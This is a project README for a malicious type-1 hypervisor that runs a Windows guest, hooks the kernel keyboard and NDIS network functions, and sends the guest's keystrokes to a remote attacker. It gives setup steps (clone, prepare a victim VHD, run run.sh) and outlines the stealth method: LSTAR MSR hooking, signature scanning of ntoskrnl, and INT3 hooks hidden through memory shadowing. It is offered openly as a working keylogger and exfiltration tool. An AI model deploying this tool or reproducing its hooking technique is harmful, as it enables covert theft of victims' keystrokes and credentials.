This project includes a malicious type 1 hypervisor (VMM) which runs a Windows guest. The VMM collects keylogs from the guest, and sends them over the network to an attacker.
-
Clone the repository.
git clone https://github.com/gognl/VMBR.git
-
In order to run the project you must acquire a Windows ISO that is compatible with Legacy BIOS. This is a little complicated. You can follow the steps described in this article in order to get the ISO. I have also summarized them:
- Download Virtualbox, Rufus, and Clonezilla. Also, get a (UEFI) Windows ISO.
- In Virtualbox, create a new VM using your UEFI Windows ISO.
- Virtualbox might have already automatically convereted the ISO to Legacy BIOS. If not, you can change the boot to Legacy BIOS through the Windows settings.
- Shut down the VM, and change its settings so that it boots from the Clonezilla ISO (a detailed explanation regarding how to do it is available in the article provided above).
- Use the clonezilla interface to load the disk to an external USB (keep in mind that its contents will be deleted).
- Use Rufus to convert the bootable USB to a VHD file.
After getting the Legacy BIOS ISO, rename it to
win10.vhd
and place it in the victim folder. -
Run run.sh
Starting the attacker will initiate scanning for victim machines. Those machines have to be up and running (and almost done booting) in order for the attacker to find them.
This project is supposed to support all (Legacy BIOS bootable) Windows versions using at least NDIS 6.0 (all versions since Windows Vista), but was only tested on Windows 10 22H2 build 19045.2965.
Regarding the network structure, the victim can be behind a NAT, but the attacker has to be accessible over the network (not behind a NAT). The attacker's IP can be changed in hooking.h.
This project must run over a 64bit Intel CPU that supports VT-x.
The project utilizes Windows functions in order to receive the keylogs and send them over the network. The functions used are:
- KeyboardClassServiceCallBack - for collecting keylogs
- NdisMIndicateReceiveNetBufferLists - for capturing incoming packets
- ndisMSendNBLToMiniportInternal (undocumented) - for sending packets
They are all hooked using INT3 and memory shadowing (to protect the hooks). The process of locating them includes:
- Hooking the LSTAR MSR, and using it to find the base of ntoskrnl (scanning backwards and looking for the correct PE header).
- Finding PsLoadedModuleList by signature-scanning ntoskrnl for a function that references it (MiObtainSectionForDriver).
- Iterating over PsLoadedModuleList to find ndis.sys and kbdclass.sys.
- Locating the relevant functions by signature-scanning in the appropriate drivers.